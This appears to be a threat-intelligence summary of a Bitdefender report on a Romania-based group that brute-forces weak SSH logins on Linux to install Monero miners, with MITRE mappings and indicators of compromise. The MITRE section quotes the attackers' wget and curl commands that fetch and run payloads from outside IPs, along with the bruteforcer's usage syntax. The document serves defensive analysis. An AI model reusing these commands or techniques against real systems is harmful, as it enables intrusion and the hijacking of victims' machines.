Bitdefender researchers uncovered a Romania-based threat group active since 2020 that primarily targets Linux machines with weak SSH credentials to deploy Monero mining malware, using a modular toolkit and obfuscated loaders. The operation relies on Discord webhooks for reporting and C2, a Golang-based SSH bruteforcer sold as a service, and multiple persistence mechanisms including systemd services, new users, and SSH keys, all while embedding miner configurations. #MexalzUS #93joshua #chernobyl #Discord #XMRig #Monero
Keypoints
- Threat group is likely based in Romania and has targeted Linux devices with weak SSH credentials since at least 2020.
- Attackers obfuscate Bash scripts by compiling them with shc and use Discord to report back data.
- The kit includes masscan, zmap, and a Golang SSH bruteforcer distributed as an as-a-service with API keys per actor.
- Initial access and propagation revolve around loader chains like .93joshua, with other loaders such as .purrple and .black.
- Infection payloads fetch from remote servers (e.g., 45.32.112.68) and install Monero miners using embedded XMRig configurations.
- Persistence is achieved via new users with sudo access, SSH key additions, and a systemd service named myservice.
MITRE Techniques
- [T1105] Ingress Tool Transfer – The infection payload is downloaded from a remote server (e.g., “wget http://194[.]33[.]45[.]197:8080/chernobyl/chernobyl.sh; … sh chernobyl.sh chernobyl;”) – “The infection payload follows these simple steps:”
- [T1059.004] Unix Shell – Commands are executed in SSH sessions to gather system info, e.g., “uname -a” and other shell probes – “The infection payload executed in the SSH sessions is: curl -O http://45[.]32[.]112[.]68/.sherifu/.93joshua … uname -a”
- [T1027] Obfuscated/Compressed Files and Information – Loaders are obfuscated via shc – “loader(s) are obfuscated via shc.”
- [T1071.001] Web Protocols – Discord is used as a C2/reporting channel via webhooks – “The loader relays it to the attacker using an HTTP POST to a Discord webhook.”
- [T1046] Network Service Discovery – Reconnaissance includes identifying SSH servers via port scanning and banner grabbing – “reconnaissance: identifying SSH servers via port scanning and banner grabbing”
- [T1110] Brute Force – A Golang-based brute-forcer (Diicot brute) is used to identify valid credentials – “identifying valid credentials via brute-force” and “Syntax: ./brute [ Port ] [ Key ] [ Routines ] [ IP File ] [ Timeout ]”
- [T1543.003] Create or Modify System Process – Persistence via systemd service “myservice” that runs /usr/bin/sshd – “a systemd service called myservice which runs the /usr/bin/sshd script”
Indicators of Compromise
- [SHA256] d73a1c77783712e67db71cbbaabd8f158bb531d23b74179cda8b8138ba15941e, ed2ae1f0729ef3a26c98b378b5f83e99741b34550fb5f16d60249405a3f0aa33
- [File Name] .93joshua, .k4m3l0t, .black, .purrple
- [Domain] mexalz.us, area17.mexalz.us
- [IP] 45.32.112.68, 207.148.118.221
- [URL] cdn.arhive.online, requests.arhive.online
- [Archive/Archive File] jack.tar.gz, juanito.tar.gz